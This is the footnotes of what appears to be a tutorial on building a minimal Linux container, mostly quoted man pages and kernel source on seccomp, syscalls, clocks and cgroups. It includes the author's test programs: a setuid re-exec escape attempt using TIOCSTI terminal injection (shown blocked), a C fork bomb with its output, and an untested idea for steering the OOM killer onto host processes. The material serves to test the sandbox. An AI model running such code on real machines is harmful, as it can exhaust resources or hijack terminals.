		Otherwise,  the SECCOMP_SET_MODE_FILTER  operation will
		fail  and return  EACCES  in  errno.  This  requirement
		ensures  that an  unprivileged process  cannot apply  a
		malicious filter and then invoke a set-user-ID or other
		privileged  program using  execve(2), thus  potentially
		compromising  that program.   (Such a  malicious filter
		might, for  example, cause an attempt  to use setuid(2)
		to  set the  caller's user  IDs to  non-zero values  to
		instead  return 0  without actually  making the  system
		call.   Thus,   the  program  might  be   tricked  into
		retaining superuser  privileges in  circumstances where
		it is possible  to influence it to  do dangerous things
		because it did not actually drop privileges.)

It took me a while to internalize this behavior. My impression was that without PR_SET_NO_NEW_PRIVS, seccomp filters would be dropped across a setuid exec. This would lead to an easy way to escape seccomp:

Create a setuid executable that calls some filtered syscall.
Become a non-root user.
Execute that setuid executable.

But that's actually not the case. Instead, you just can't set seccomp filters unless you have one of the following:

PR_SET_NO_NEW_PRIVS == 1
CAP_SYS_ADMIN

and so libseccomp sets PR_SET_NO_NEW_PRIVS by default.

Here's the code I thought would work:

Listing 137: setuidd_lower_reexec_and_escape.c

/* -*- compile-command: "gcc -Wall -Werror -static setuidd_lower_reexec_and_escape.c -o setuidd_lower_reexec_and_escape" -*- */
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <sys/ioctl.h>

int main (int argc, char **argv)
{
	if (argc == 1) {
		if (setresuid(99, 99, 99)) {
			fprintf(stderr, "++ setresuid failed: %m\n");
			return 1;
		}
		if (execve(argv[0], (char *[]) {argv[0], "-", 0}, NULL)) {
			fprintf(stderr, "++ execve failed: %m\n");
			return 1;
		}
	} else {
		uid_t a = 0, b = 0, c = 0;
		getresuid(&a, &b, &c);
		fprintf(stderr, "++ we're %u/%u/%u.\n", a, b, c);
		if (ioctl(STDIN_FILENO, TIOCSTI, "!")) {
		     fprintf(stderr, "++ ioctl failed: %m\n");
		     return 1;
		}
	}
}

but it doesn't:

[lizzie@empress l-c-i-500-l]$sudo chown root setuidd_lower_reexec_and_escape
[lizzie@empress l-c-i-500-l]$sudo chmod 4007 setuidd_lower_reexec_and_escape
[lizzie@empress l-c-i-500-l]$sudo ./contained -m . -u 0 -c ./setuidd_lower_reexec_and_escape
=> validating Linux version...4.7.10.201610222037-1-grsec on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.ZM2vnz...done.
=> trying a user namespace...writing /proc/2095/uid_map...writing
/proc/2095/gid_map...done.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.  ++ we're 99/99/99.  ++ ioctl failed:
Operation not permitted
=> cleaning cgroups...done.

Here's the code responsible for that check:

Listing 138: kernel/seccomp.c:340@c8d2bc

/**
 * seccomp_prepare_filter: Prepares a seccomp filter for use.
 * @fprog: BPF program to install
 *
 * Returns filter on success or an ERR_PTR on failure.
 */
static struct seccomp_filter *seccomp_prepare_filter(struct sock_fprog *fprog)
{
	struct seccomp_filter *sfilter;
	int ret;
	const bool save_orig = IS_ENABLED(CONFIG_CHECKPOINT_RESTORE);

	if (fprog->len == 0 || fprog->len > BPF_MAXINSNS)
		return ERR_PTR(-EINVAL);

	BUG_ON(INT_MAX / fprog->len < sizeof(struct sock_filter));

	/*
	 * Installing a seccomp filter requires that the task has
	 * CAP_SYS_ADMIN in its namespace or be running with no_new_privs.
	 * This avoids scenarios where unprivileged tasks can affect the
	 * behavior of privileged children.
	 */
	if (!task_no_new_privs(current) &&
	    security_capable_noaudit(current_cred(), current_user_ns(),
				     CAP_SYS_ADMIN) != 0)
		return ERR_PTR(-EACCES);

	/* Allocate a new seccomp_filter */
	sfilter = kzalloc(sizeof(*sfilter), GFP_KERNEL | __GFP_NOWARN);
	if (!sfilter)
		return ERR_PTR(-ENOMEM);

	ret = bpf_prog_create_from_user(&sfilter->prog, fprog,
					seccomp_check_filter, save_orig);
	if (ret < 0) {
		kfree(sfilter);
		return ERR_PTR(ret);
	}

	atomic_set(&sfilter->usage, 1);

	return sfilter;
}

and the code that unconditionally copies the seccomp filter to every new task on fork and clone (exec keeps the same task, so the filter stays in place):

Listing 139: kernel/fork.c:1268@c8d2bc

static void copy_seccomp(struct task_struct *p)
{
#ifdef CONFIG_SECCOMP
	/*
	 * Must be called with sighand->lock held, which is common to
	 * all threads in the group. Holding cred_guard_mutex is not
	 * needed because this new task is not yet running and cannot
	 * be racing exec.
	 */
	assert_spin_locked(&current->sighand->siglock);

	/* Ref-count the new filter user, and assign it. */
	get_seccomp_filter(current);
	p->seccomp = current->seccomp;

	/*
	 * Explicitly enable no_new_privs here in case it got set
	 * between the task_struct being duplicated and holding the
	 * sighand lock. The seccomp state and nnp must be in sync.
	 */
	if (task_no_new_privs(current))
		task_set_no_new_privs(p);

	/*
	 * If the parent gained a seccomp mode after copying thread
	 * flags and between before we held the sighand lock, we have
	 * to manually enable the seccomp thread flag here.
	 */
	if (p->seccomp.mode != SECCOMP_MODE_DISABLED)
		set_tsk_thread_flag(p, TIF_SECCOMP);
#endif
}

(called by copy_process in kernel/fork.c@c8d2bc).

⁵⁷

Listing 170: man 2 _sysctl

NOTES
	Glibc does not provide a  wrapper for this system call; call
	it using  syscall(2).  Or rather...   don't call it:  use of
	this system  call has  long been discouraged,  and it  is so
	unloved that  it is likely  to disappear in a  future kernel
	version.   Since  Linux 2.6.24,  uses  of  this system  call
	result in warnings  in the kernel log.  Remove  it from your
	programs now; use the /proc/sys interface instead.

	This  system  call  is  available only  if  the  kernel  was
	configured with the CONFIG_SYSCTL_SYSCALL option.

Listing 171: init/Kconfig:1420@c8d2bc

config SYSCTL_SYSCALL
	bool "Sysctl syscall support" if EXPERT
	depends on PROC_SYSCTL
	default n
	select SYSCTL
	---help---
	  sys_sysctl uses binary paths that have been found challenging
	  to properly maintain and use.  The interface in /proc/sys
	  using paths with ascii names is now the primary path to this
	  information.

	  Almost nothing using the binary sysctl interface so if you are
	  trying to save some space it is probably safe to disable this,
	  making your kernel marginally smaller.

	  If unsure say N here.

⁵⁸

Listing 172: man 2 alloc_hugepages

DESCRIPTION
	The system calls alloc_hugepages() and free_hugepages() were
	introduced  in Linux  2.5.36  and removed  again in  2.5.54.
	They  existed  only  on  i386  and  ia64  (when  built  with
	CONFIG_HUGETLB_PAGE).  In Linux  2.4.20, the syscall numbers
	exist, but the calls fail with the error ENOSYS.

⁵⁹

Listing 173: man 2 bdflush

DESCRIPTION
	Note: Since  Linux 2.6, this  system call is  deprecated and
	does nothing.   It is  likely to  disappear altogether  in a
	future  kernel release.   Nowadays,  the  task performed  by
	bdflush() is handled by the kernel pdflush thread.

⁶⁰

Listing 169: man 2 create_module

DESCRIPTION
	Note: This  system call  is present  only in  kernels before
	Linux 2.6.

⁶¹

Listing 167: man 2 nfsservctl

NAME
	nfsservctl - syscall interface to kernel nfs daemon

SYNOPSIS
	#include <linux/nfsd/syscall.h>

	long nfsservctl(int cmd, struct nfsctl_arg *argp,
				 union nfsctl_res *resp);

DESCRIPTION
	Note: Since  Linux 3.1, this  system call no  longer exists.
	It  has  been  replaced  by  a set  of  files  in  the  nfsd
	filesystem; see nfsd(7).

⁶²

Listing 158: man 2 syscalls

	perfctr(2)	2.2	Sparc; removed in 2.6.34

⁶³

Listing 146: man 2 get_kernel_syms

GET_KERNEL_SYMS(2) -- 2016-10-08 -- Linux -- Linux Programmer's Manual

NAME
	get_kernel_syms  -  retrieve   exported  kernel  and  module
	symbols

SYNOPSIS
	#include <linux/module.h>

	int get_kernel_syms(struct kernel_sym *table);

	Note:  No declaration  of this  system call  is provided  in
	glibc headers; see NOTES.

DESCRIPTION
	Note: This  system call  is present  only in  kernels before
	Linux 2.6.

⁶⁴

Listing 154: man 2 setup

SETUP(2) -- 2008-12-03 -- Linux -- Linux Programmer's Manual

NAME
	setup - setup devices and filesystems, mount root filesystem

	[...]

VERSIONS
	Since Linux 2.1.121, no such function exists anymore.

⁶⁵

man 2 clock_settime is unfortunately pretty vague:

Listing 160: man 2 clock_settime

    CLOCK_GETRES(2) -- 2016-05-09 -- Linux Programmer's Manual

    NAME
            clock_getres, clock_gettime, clock_settime  - clock and time
            functions

            [...]

    ERRORS

            EFAULT
                    tp points outside the accessible address space.

            EINVAL
                    The clk_id specified is not supported on this system.

            EPERM
                    clock_settime()  does not  have permission  to set  the
                    clock indicated.

but you can see in the source that CLOCK_REALTIME is the only clock with .clock_set and .clock_adj set:

Listing 161: kernel/time/posix-timers.c:282@c8d2bc

    /*
     * Initialize everything, well, just everything in Posix clocks/timers ;)
     */
    static __init int init_posix_timers(void)
    {
            struct k_clock clock_realtime = {
                    .clock_getres   = posix_get_hrtimer_res,
                    .clock_get      = posix_clock_realtime_get,
                    .clock_set      = posix_clock_realtime_set,
                    .clock_adj      = posix_clock_realtime_adj,
                    .nsleep         = common_nsleep,
                    .nsleep_restart = hrtimer_nanosleep_restart,
                    .timer_create   = common_timer_create,
                    .timer_set      = common_timer_set,
                    .timer_get      = common_timer_get,
                    .timer_del      = common_timer_del,
            };
            struct k_clock clock_monotonic = {
                    .clock_getres   = posix_get_hrtimer_res,
                    .clock_get      = posix_ktime_get_ts,
                    .nsleep         = common_nsleep,
                    .nsleep_restart = hrtimer_nanosleep_restart,
                    .timer_create   = common_timer_create,
                    .timer_set      = common_timer_set,
                    .timer_get      = common_timer_get,
                    .timer_del      = common_timer_del,
            };
            struct k_clock clock_monotonic_raw = {
                    .clock_getres   = posix_get_hrtimer_res,
                    .clock_get      = posix_get_monotonic_raw,
            };
            struct k_clock clock_realtime_coarse = {
                    .clock_getres   = posix_get_coarse_res,
                    .clock_get      = posix_get_realtime_coarse,
            };
            struct k_clock clock_monotonic_coarse = {
                    .clock_getres   = posix_get_coarse_res,
                    .clock_get      = posix_get_monotonic_coarse,
            };
            struct k_clock clock_tai = {
                    .clock_getres   = posix_get_hrtimer_res,
                    .clock_get      = posix_get_tai,
                    .nsleep         = common_nsleep,
                    .nsleep_restart = hrtimer_nanosleep_restart,
                    .timer_create   = common_timer_create,
                    .timer_set      = common_timer_set,
                    .timer_get      = common_timer_get,
                    .timer_del      = common_timer_del,
            };
            struct k_clock clock_boottime = {
                    .clock_getres   = posix_get_hrtimer_res,
                    .clock_get      = posix_get_boottime,
                    .nsleep         = common_nsleep,
                    .nsleep_restart = hrtimer_nanosleep_restart,
                    .timer_create   = common_timer_create,
                    .timer_set      = common_timer_set,
                    .timer_get      = common_timer_get,
                    .timer_del      = common_timer_del,
            };

            posix_timers_register_clock(CLOCK_REALTIME, &clock_realtime);
            posix_timers_register_clock(CLOCK_MONOTONIC, &clock_monotonic);
            posix_timers_register_clock(CLOCK_MONOTONIC_RAW, &clock_monotonic_raw);
            posix_timers_register_clock(CLOCK_REALTIME_COARSE, &clock_realtime_coarse);
            posix_timers_register_clock(CLOCK_MONOTONIC_COARSE, &clock_monotonic_coarse);
            posix_timers_register_clock(CLOCK_BOOTTIME, &clock_boottime);
            posix_timers_register_clock(CLOCK_TAI, &clock_tai);

            posix_timers_cache = kmem_cache_create("posix_timers_cache",
                                            sizeof (struct k_itimer), 0, SLAB_PANIC,
                                            NULL);
            return 0;
    }

and that those methods go through settimeofday and adjtimex, which are both also gated by CAP_SYS_TIME.

Listing 162: kernel/time/posix-timers.c:212@c8d2bc

    /* Set clock_realtime */
    static int posix_clock_realtime_set(const clockid_t which_clock,
                                        const struct timespec *tp)
    {
            return do_sys_settimeofday(tp, NULL);
    }

    static int posix_clock_realtime_adj(const clockid_t which_clock,
                                        struct timex *t)
    {
            return do_adjtimex(t);
    }

Listing 163: security/commoncap.c:106@c8d2bc

    /**
     * cap_settime - Determine whether the current process may set the system clock
     * @ts: The time to set
     * @tz: The timezone to set
     *
     * Determine whether the current process may set the system clock and timezone
     * information, returning 0 if permission granted, -ve if denied.
     */
    int cap_settime(const struct timespec64 *ts, const struct timezone *tz)
    {
            if (!capable(CAP_SYS_TIME))
                    return -EPERM;
            return 0;
    }

Listing 164: kernel/time/ntp.c:657@c8d2bc

    /**
     * ntp_validate_timex - Ensures the timex is ok for use in do_adjtimex
     */
    int ntp_validate_timex(struct timex *txc)
    {
            if (txc->modes & ADJ_ADJTIME) {
                    /* singleshot must not be used with any other mode bits */
                    if (!(txc->modes & ADJ_OFFSET_SINGLESHOT))
                            return -EINVAL;
                    if (!(txc->modes & ADJ_OFFSET_READONLY) &&
                        !capable(CAP_SYS_TIME))
                            return -EPERM;
            } else {
                    /* In order to modify anything, you gotta be super-user! */
                     if (txc->modes && !capable(CAP_SYS_TIME))
                            return -EPERM;
                    /*
                     * if the quartz is off by more than 10% then
                     * something is VERY wrong!
                     */
                    if (txc->modes & ADJ_TICK &&
                        (txc->tick <  900000/USER_HZ ||
                         txc->tick > 1100000/USER_HZ))
                            return -EINVAL;
            }

            /* ... */
    }
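
The behavior traced through these listings can be probed from user space. A minimal sketch, with a hypothetical helper try_set_clock that is not part of contained.c: it reads a clock and immediately tries to write the same value back, returning the resulting errno. On the kernel quoted here I'd expect EINVAL for clocks that have no .clock_set, and EPERM for CLOCK_REALTIME when the caller lacks CAP_SYS_TIME. A seccomp filter that blocks clock_settime may report EPERM for every clock instead.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <time.h>

/* Hypothetical probe: read clock `id`, then try to set it to the value
 * just read. Returns 0 on success, otherwise the errno of the call that
 * failed. Careful: with CAP_SYS_TIME and CLOCK_REALTIME this really does
 * set the clock (to roughly its current value). */
int try_set_clock(clockid_t id)
{
	struct timespec now;

	if (clock_gettime(id, &now) == -1)
		return errno;
	if (clock_settime(id, &now) == -1)
		return errno;
	return 0;
}
```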

⁶⁶

Listing 165: man 3 adjtime

    ADJTIME(3) -- 2016-03-15 -- Linux -- Linux Programmer's Manual

    NAME
            adjtime - correct the time to synchronize the system clock

            [...]

    ERRORS

            EINVAL
                    The adjustment in delta is outside the permitted range.

            EPERM
                    The caller does not have sufficient privilege to adjust
                    the time.  Under Linux,  the CAP_SYS_TIME capability is
                    required.

⁶⁷

Listing 159: man 2 pciconfig_read

PCICONFIG_READ(2) -- 2016-07-17 -- Linux -- Linux Programmer's Manual

NAME
	pciconfig_read,  pciconfig_write,   pciconfig_iobase  -  pci
	device information handling
	[...]
ERRORS
	[...]
	EPERM
		User does not have  the CAP_SYS_ADMIN capability.  This
		does not apply to pciconfig_iobase().

⁶⁸

Too many to list, but see man 2 quotactl.

⁶⁹

Listing 143: man 2 ustat

    USTAT(2) -- 2003-08-04 -- Linux -- Linux Programmer's Manual

    NAME
            ustat - get filesystem statistics

    SYNOPSIS
            #include <sys/types.h>
            #include <unistd.h>    /* libc[45] */
            #include <ustat.h>     /* glibc2 */

            int ustat(dev_t dev, struct ustat *ubuf);

    DESCRIPTION
            ustat() returns information about a mounted filesystem.  dev
            is a device number identifying a device containing a mounted
            filesystem.  ubuf  is a  pointer to  a ustat  structure that
            contains the following members:

                daddr_t f_tfree;      /* Total free blocks */
                ino_t   f_tinode;     /* Number of free inodes */
                char    f_fname[6];   /* Filsys name */
                char    f_fpack[6];   /* Filsys pack name */

            The  last   two  fields,   f_fname  and  f_fpack,   are  not
            implemented  and  will  always  be filled  with  null  bytes
            ('\0').

⁷⁰

Listing 142: man 2 sysfs

    SYSFS(2) -- 2010-06-27 -- Linux -- Linux Programmer's Manual

    NAME
            sysfs - get filesystem type information

    SYNOPSIS
            int sysfs(int option, const char *fsname);

            int sysfs(int option, unsigned int fs_index, char *buf);

            int sysfs(int option);

    DESCRIPTION
            sysfs()  returns  information  about  the  filesystem  types
            currently present in  the kernel.  The specific  form of the
            sysfs()  call and  the information  returned depends  on the
            option in effect:

            1  Translate the filesystem identifier  string fsname into a
               filesystem type index.

            2  Translate  the  filesystem  type index  fs_index  into  a
               null-terminated   filesystem  identifier   string.   This
               string will be  written to the buffer pointed  to by buf.
               Make sure that buf has enough space to accept the string.

            3  Return  the total  number of  filesystem types  currently
               present in the kernel.

            The  numbering of  the filesystem  type indexes  begins with
            zero.

⁷¹

Listing 150: man 2 uselib

USELIB(2) -- 2016-03-15 -- Linux -- Linux Programmer's Manual

NAME
	uselib - load shared library

	[...]

NOTES
	[...]

	Since Linux  3.15, this system  call is available  only when
	the kernel is configured with the CONFIG_USELIB option.

⁷²

Listing 148: man 2 sync_file_range2

SYNC_FILE_RANGE(2) -- 2014-08-19 -- Linux -- Linux Programmer's Manual

NAME
	sync_file_range - sync a file segment with disk

	[...]
NOTES

   sync_file_range2()
	Some   architectures  (e.g.,   PowerPC,  ARM)   need  64-bit
	arguments to be aligned in a suitable pair of registers.  On
	such architectures, the  call signature of sync_file_range()
	shown in the SYNOPSIS would force a register to be wasted as
	padding  between   the  fd   and  offset   arguments.   (See
	syscall(2)  for  details.)  Therefore,  these  architectures
	define  a different  system call  that orders  the arguments
	suitably:

	    int sync_file_range2(int fd, unsigned int flags,
						off64_t offset, off64_t nbytes);

	The behavior  of this system  call is otherwise  exactly the
	same as sync_file_range().

⁷³

Listing 147: man 2 readdir

READDIR(2) -- 2013-06-21 -- Linux -- Linux Programmer's Manual

NAME
	readdir - read directory entry

SYNOPSIS

	int readdir(unsigned int fd, struct old_linux_dirent *dirp,
			  unsigned int count);

	Note: There  is no glibc  wrapper for this system  call; see
	NOTES.

DESCRIPTION
	This is  not the  function you are  interested in.   Look at
	readdir(3)  for the  POSIX conforming  C library  interface.
	This page  documents the bare kernel  system call interface,
	which is superseded by getdents(2).

	readdir()  reads  one  old_linux_dirent structure  from  the
	directory referred  to by  the file  descriptor fd  into the
	buffer pointed to  by dirp.  The argument  count is ignored;
	at most one old_linux_dirent structure is read.

⁷⁴

Listing 168: man 2 kexec_file_load

NAME
	kexec_load, kexec_file_load  - load  a new kernel  for later
	execution
	[...]
ERRORS
	[...]
	EPERM
		The caller does not have the CAP_SYS_BOOT capability.

⁷⁵

Listing 166: man 2 nice

NICE(2) -- 2016-03-15 -- Linux -- Linux Programmer's Manual

NAME
	nice - change process priority

	[...]
ERRORS

	EPERM
		The calling process attempted  to increase its priority
		by  supplying  a  negative  inc  but  has  insufficient
		privileges.  Under  Linux, the  CAP_SYS_NICE capability
		is   required.   (But   see  the   discussion  of   the
		RLIMIT_NICE resource limit in setrlimit(2).)

⁷⁶

Listing 157: man 2 perfmonctl

PERFMONCTL(2) -- 2013-02-13 -- Linux -- Linux Programmer's Manual

NAME
	perfmonctl - interface to IA-64 performance monitoring unit

	[...]

CONFORMING TO
	perfmonctl() is Linux-specific and  is available only on the
	IA-64 architecture.

⁷⁷

Listing 156: man 2 syscalls

	ppc_rtas(2)	2.6.2	PowerPC only

⁷⁸

Listing 152: man 2 spu_create

SPU_CREATE(2) -- 2015-12-28 -- Linux -- Linux Programmer's Manual

NAME
	spu_create - create a new spu context

SYNOPSIS
	#include <sys/types.h>
	#include <sys/spu.h>

	int spu_create(const char *pathname, int flags, mode_t mode);
	int spu_create(const char *pathname, int flags, mode_t mode,
				int neighbor_fd);

	Note: There  is no glibc  wrapper for this system  call; see
	NOTES.

DESCRIPTION
	The  spu_create() system  call is  used on  PowerPC machines
	that  implement the  Cell Broadband  Engine Architecture  in
	order  to access  Synergistic  Processor  Units (SPUs).   It
	creates a  new logical  context for an  SPU in  pathname and
	returns a file descriptor associated with it.  pathname must
	refer to a  nonexistent directory in the mount  point of the
	SPU filesystem  (spufs).  If  spu_create() is  successful, a
	directory is  created at pathname  and it is  populated with
	the files described in spufs(7).

⁷⁹

Listing 153: man 2 spu_run

SPU_RUN(2) -- 2012-08-05 -- Linux -- Linux Programmer's Manual

NAME
	spu_run - execute an SPU context

SYNOPSIS
	#include <sys/spu.h>

	int spu_run(int fd, unsigned int *npc, unsigned int *event);

	Note: There  is no glibc  wrapper for this system  call; see
	NOTES.

DESCRIPTION
	The spu_run() system  call is used on  PowerPC machines that
	implement the Cell Broadband Engine Architecture in order to
	access Synergistic Processor Units  (SPUs).  The fd argument
	is a  file descriptor returned by  spu_create(2) that refers
	to a specific SPU context.   When the context gets scheduled
	to a  physical SPU, it  starts execution at  the instruction
	pointer passed in npc.

⁸⁰

Listing 151: man 2 subpage_prot

SUBPAGE_PROT(2) -- 2012-07-13 -- Linux -- Linux Programmer's Manual

NAME
	subpage_prot -  define a  subpage protection for  an address
	range

	[...]

VERSIONS
	This  system call  is provided  on the  PowerPC architecture
	since Linux 2.6.25.  The system call is provided only if the
	kernel is configured  with CONFIG_PPC_64K_PAGES.  No library
	support is provided.

⁸¹

Listing 149: man 2 syscalls

	utrap_install(2)	2.2	Sparc only

⁸²

Listing 144: man 2 syscalls

	kern_features(2)	3.7	Sparc64

This is pretty vague, so I looked at the source. It's only mentioned in a Sparc64-specific file:

Listing 145: arch/sparc/kernel/sys_sparc_64.c:648@c8d2bc

asmlinkage long sys_kern_features(void)
{
	return KERN_FEATURE_MIXED_MODE_STACK;
}

⁸³

Listing 155: man 2 preadv2

DESCRIPTION
	The readv() system  call reads iovcnt buffers  from the file
	associated  with the  file  descriptor fd  into the  buffers
	described by iov ("scatter input").

	The  writev()  system call  writes  iovcnt  buffers of  data
	described  by  iov to  the  file  associated with  the  file
	descriptor fd ("gather output").

	[...]

	The readv() system call works  just like read(2) except that
	multiple buffers are filled.

	The  writev() system  call works  just like  write(2) except
	that multiple buffers are written out.

	[...]

   preadv() and pwritev()
	The  preadv()  system  call combines  the  functionality  of
	readv() and pread(2).  It performs the same task as readv(),
	but adds a fourth argument, offset, which specifies the file
	offset at which the input operation is to be performed.

	The  pwritev() system  call  combines  the functionality  of
	writev()  and  pwrite(2).   It  performs the  same  task  as
	writev(),  but   adds  a  fourth  argument,   offset,  which
	specifies the file  offset at which the  output operation is
	to be performed.

	The file offset  is not changed by these  system calls.  The
	file referred to by fd must be capable of seeking.

   preadv2() and pwritev2()

	These  system calls  are similar  to preadv()  and pwritev()
	calls, but add  a fifth argument, flags,  which modifies the
	behavior on a per-call basis.

	Unlike preadv() and pwritev(), if the offset argument is -1,
	then the current file offset is used and updated.

	The flags argument contains a bitwise  OR of zero or more of
	the following flags:

	RWF_DSYNC (since Linux 4.7)
		Provide a  per-write equivalent of the  O_DSYNC open(2)
		flag.  This flag is meaningful only for pwritev2(), and
		its effect  applies only to  the data range  written by
		the system call.

	RWF_HIPRI (since Linux 4.6)
		High    priority   read/write.     Allows   block-based
		filesystems  to  use  polling   of  the  device,  which
		provides   lower  latency,   but  may   use  additional
		resources.  (Currently, this feature  is usable only on
		a file descriptor opened using the O_DIRECT flag.)

	RWF_SYNC (since Linux 4.7)
		Provide a  per-write equivalent  of the  O_SYNC open(2)
		flag.  This flag is meaningful only for pwritev2(), and
		its effect  applies only to  the data range  written by
		the system call.

⁸⁴

This isn't just a denial-of-service concern. If a process consumes a lot of memory and has a lower badness score than some critical host-side process, the kernel's out-of-memory killer will kill the host-side process instead.

The badness score favors longer-running processes, among other things:

"Taming the OOM Killer" on LWN:

The process to be killed in an out-of-memory situation is selected based on its badness score. The badness score is reflected in /proc/<pid>/oom_score. This value is determined on the basis that the system loses the minimum amount of work done, recovers a large amount of memory, doesn't kill any innocent process eating tons of memory, and kills the minimum number of processes (if possible limited to one). The badness score is computed using the original memory size of the process, its CPU time (utime + stime), the run time (uptime - start time) and its oom_adj value. The more memory the process uses, the higher the score. The longer a process is alive in the system, the smaller the score.

I haven't demonstrated it, but I believe this could be manipulated to cause a screen lock program to be killed, for example. It's not unheard of for e.g. xscreensaver to leak memory:

"gltext seems to leak memory eventually causing oom-killer to run":

gltext is consuming large amounts of memory. Often being killed by oom-killer but eventually causing me not to be able to log into my computer disabling gltext from the list of possible screensavers caused the problem to go away.

There's even an open Ubuntu xscreensaver bug to make the OOM killer more likely to kill xscreensaver. This seems like the wrong direction to me….

"xscreensaver does not protect the system against its children":

The thing is, a screensaver is NOT a critically important part of the system. It should die early if it is a resource hog. All you have to do is write "10" into /proc/PID/oom_adj and Bob's your uncle. Until then, Xscreensaver is failing its duties.
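
The score described in the LWN excerpt can be read back for any process. A minimal sketch, assuming procfs is mounted at /proc; read_oom_score is a hypothetical helper, and treating pid 0 as "the calling process" is a convention of this sketch only.

```c
#include <stdio.h>
#include <sys/types.h>

/* Hypothetical helper: return the OOM badness score the kernel currently
 * reports for `pid` in /proc/<pid>/oom_score, or -1 if it can't be read.
 * A pid of 0 means the calling process (via /proc/self). */
long read_oom_score(pid_t pid)
{
	char path[64];
	long score;
	FILE *f;

	if (pid == 0)
		snprintf(path, sizeof(path), "/proc/self/oom_score");
	else
		snprintf(path, sizeof(path), "/proc/%ld/oom_score", (long)pid);
	f = fopen(path, "r");
	if (!f)
		return -1;
	if (fscanf(f, "%ld", &score) != 1)
		score = -1;
	fclose(f);
	return score;
}
```

Comparing read_oom_score() for a contained process against a host-side one is a quick way to see which of the two the OOM killer would prefer.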

⁸⁵

Listing 174: man 7 cgroup_namespaces

	Cgroup namespaces virtualize the view of a process's cgroups
	(see   cgroups(7))  as   seen  via   /proc/[pid]/cgroup  and
	/proc/[pid]/mountinfo.

	Each  cgroup  namespace  has  its own  set  of  cgroup  root
	directories,  which are  the  base points  for the  relative
	locations displayed  in /proc/[pid]/cgroup.  When  a process
	creates a new cgroup  namespace using clone(2) or unshare(2)
	with  the  CLONE_NEWCGROUP  flag,  it enters  a  new  cgroup
	namespace in  which its  current cgroups  directories become
	the  cgroup root  directories of  the new  namespace.  (This
	applies both for  the cgroups version 1  hierarchies and the
	cgroups version 2 unified hierarchy.)

⁸⁶

Listing 175: Documentation/cgroup-v1/memory.txt@c8d2bc

Brief summary of control files.
[...]
 memory.limit_in_bytes		 # set/show limit of memory usage

⁸⁷

Listing 176: Documentation/cgroup-v1/memory.txt@c8d2bc

Brief summary of control files.
[...]
 memory.kmem.limit_in_bytes      # set/show hard limit for kernel memory

⁸⁸

Listing 179: man 7 cgroups

   Cgroups version 1 controllers
	Each of the  cgroups version 1 controllers is  governed by a
	kernel configuration  option (listed  below).  Additionally,
	the availability of  the cgroups feature is  governed by the
	CONFIG_CGROUPS kernel configuration option.

	cpu (since Linux 2.6.24; CONFIG_CGROUP_SCHED)
		Cgroups  can be  guaranteed  a minimum  number of  "CPU
		shares" when a  system is busy.  This does  not limit a
		cgroup's CPU usage if the CPUs are not busy.

		Further information  can be found in  the kernel source
		file Documentation/scheduler/sched-bwc.txt.

⁸⁹

Listing 177: Documentation/cgroup-v1/pids.txt@c8d2bc

						   Process Number Controller
						   =========================

Abstract
--------

The process number controller is used to allow a cgroup hierarchy to stop any
new tasks from being fork()'d or clone()'d after a certain limit is reached.

Since it is trivial to hit the task limit without hitting any kmemcg limits in
place, PIDs are a fundamental resource. As such, PID exhaustion must be
preventable in the scope of a cgroup hierarchy by allowing resource limiting of
the number of tasks in a cgroup.

Usage
-----

In order to use the `pids` controller, set the maximum number of tasks in
pids.max (this is not available in the root cgroup for obvious reasons). The
number of processes currently in the cgroup is given by pids.current.

For example, here is a fork bomb and what happens when it runs inside the container:

Listing 178: forkbomb.c

/* -*- compile-command: "gcc -Wall -Werror -static forkbomb.c -o forkbomb" -*- */
#include <stdio.h>
#include <unistd.h>
#include <errno.h>

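int main (int argc, char **argv)
{
	switch (fork()) {
	case -1:
		fprintf(stderr, "++ couldn't even fork once: %m\n");
		return 1;
	case 0:
		/* Child: fork forever. Every process that comes out of
		   fork(), parent or child, goes around the loop again. */
		while (1) {
			switch (fork()) {
			case -1:
				/* Hit a limit; keep retrying. */
				break;
			case 0:
				fprintf(stderr, "++ successful fork.\n");
				break;
			default:
				break;
			}
		}
		break;
	default:
		/* Original parent: just stay alive. */
		while (1) sleep(1);
		break;
	}
	return 0;
}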

[lizzie@empress l-c-i-500-l]$ sudo ./contained -m . -u 0 -c forkbomb
=> validating Linux version...4.7.10.201610222037-1-grsec on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.0sOZgF...done.
=> trying a user namespace...writing /proc/2184/uid_map...writing /proc/2184/gid_map...done.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
C-c C-c

⁹⁰

Listing 180: Documentation/cgroup-v1/blkio-controller.txt@c8d2bc

Details of cgroup files
=======================
Proportional weight policy files
--------------------------------
- blkio.weight
	- Specifies per cgroup weight. This is default weight of the group
	  on all the devices until and unless overridden by per device rule.
	  (See blkio.weight_device).
	  Currently allowed range of weights is from 10 to 1000.

⁹¹

Listing 182: man 7 cgroups

   Creating cgroups and moving processes
	A cgroup filesystem initially contains a single root cgroup,
	'/', which all processes belong to.  A new cgroup is created
	by creating a directory in the cgroup filesystem:

